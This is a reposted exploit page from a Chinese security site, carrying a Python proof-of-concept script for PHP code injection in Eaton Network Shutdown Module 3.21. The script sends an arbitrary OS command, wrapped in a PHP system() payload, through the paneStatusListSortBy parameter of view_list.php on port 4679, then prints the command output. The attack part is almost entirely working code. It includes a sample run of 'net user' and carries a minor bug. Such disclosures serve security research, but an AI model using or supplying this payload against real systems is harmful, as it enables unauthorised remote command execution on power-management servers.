首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Eaton Network Shutdown Module 3.21 PHP Code Injection
来源:http://www.wsec.be 作者:Waeytens 发布时间:2013-12-09  
#!/usr/bin/env python
#
# Quick 'n' Dirty - Metasploit module didn't do it for me
# 2013 - Filip Waeytens - http://www.wsec.be
#
# Usage Example:
##~  $ python eaton.py 192.168.1.9 "net user"
#
#User accounts for \\
#
#-------------------------------------------------------------------------------
#Guest                    LocalAdmin              
#The command completed with one or more errors.
#
# Exploit Title: Eaton shutdown module php eval exploit
# Date: 5 dec2013
# Exploit Author: Filip Waeytens
# Vendor Homepage: powerquality.eaton.com
# Software Link: http://powerquality.eaton.com/Products-services/Power-Management/Software-Drivers/network-shutdown.asp
# Version: 3.21
# Tested on: WIN
#References:
###Exploit Database: 23006
###Secunia Advisory ID: 49103
###Bugtraq ID: 54161
###Related OSVDB ID: 83200 83201
###Packet Storm: http://packetstormsecurity.org/files/118420/Network-Shutdown-Module-3.21-Remote-PHP-Code-Injection.html
#
 
import httplib
import urllib
import sys
import BeautifulSoup
 
#### First argument is the target IP - port defaults to 4679
 
targetip = sys.argv[1]
command = sys.argv[2]
targetport=4679
 
 
#### if a command has spaces: put between double quotes, the next lines strip the quotes
 
if command.startswith('"') and string.endswith('"'):
    command = command[1:-1]
 
#### build the urL to request
     
baserequest = "/view_list.php?paneStatusListSortBy="
wrappedcommand="${@print(system(\""+command+"\"))}"
ue_command = urllib.quote_plus(wrappedcommand)
 
#### send request
conn = httplib.HTTPConnection(targetip+":"+str(targetport))
conn.request("GET", baserequest+ue_command)
r1 = conn.getresponse()
#print "Getting answer: "
#print r1.status, r1.reason
#print "sent http://"+targetip+":"+str(targetport)+baserequest+ue_command
data1 = r1.read()
 
 
#### extract answer
 
soup = BeautifulSoup.BeautifulSoup(data1)
for p in soup.findAll("p"):
            #print dir(p)
            #strip first line
             
            result = p.getText().split("Warning")[0]
            print result.replace("Multi-source information on the power devices suppying the protected server","",1)



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·D-Link DSR Router Remote Root
·Up.Time Monitoring Station pos
·Steinberg MyMp3PRO 5.0 - Buffe
·ad GOM Player 2.2.53.5169 - SE
·Joomla Hotornot2 Shell Upload
·vBulletin index.php/ajax/api/r
·Kaseya uploadImage Arbitrary F
·HP LoadRunner EmulationAdmin W
·OpenSSL Denial Of Service
·Adobe ColdFusion 9 Administrat
·D-Link DIR-XXX Remote Root Acc
·EMC Data Protection Advisor DP
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved